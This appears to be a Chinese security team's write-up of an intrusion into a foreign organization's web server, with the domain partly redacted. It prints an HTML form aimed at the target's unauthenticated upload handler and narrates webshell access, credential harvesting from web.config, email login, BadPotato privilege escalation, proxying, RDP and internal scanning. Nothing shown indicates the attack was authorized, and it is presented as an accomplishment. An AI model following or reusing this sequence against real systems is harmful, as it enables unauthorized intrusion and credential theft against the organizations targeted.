此次渗透特此感谢HashRun安全的HashMeow小组成员:f0z,Kong,W01h4cker师傅们(排名不分先后)
HashRun安全团队是由年轻白帽们自发组织的团队,致力于技术研究,旨在为网络安全贡献精英力量,在实战演练、大型渗透等项目中屡获佳绩;团队擅长APT技术、项目实施、入侵检测及响应、安服及线下值守、信安培训、竞赛指导、无线电、硬件DIY等
目标是某国组织
主域名:www.xxx.xxx.xx
然后对其进行信息收集:
发现了一个这个子域名,对这个子域名进行进一步的信息收集发现:
发现一个未授权的上传接口
本地构造form表单上传抓包:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
<form action="https://daphuongtien.xxx.xxx.xxx/UploadFile/hUploadFile.ashx" method="post">
<input type="file" name="file"/>
<input type="submit" value="Submit" />
</form>
</body>
</html>
上传成功直接webshell管理工具连接
因为是asp的站点,收集下web.config文件的东西
这邮箱还真的能登陆上
发现只有再web目录有写的权限,其他权限很低,于是先在别的目录下写个shell
然后尝试坏土豆提权,最后成功
然后目标不出网做正向代理,并开启入口的rdp
然后扫内网的时候发现触发了告警,对方运维直接下线了入口机器
HashRun安全团队CTF小组招收cry方向,re方向,pwn方向师傅,欢迎师傅联系我们团队投递简历,联系方式在公众号主页,注明来意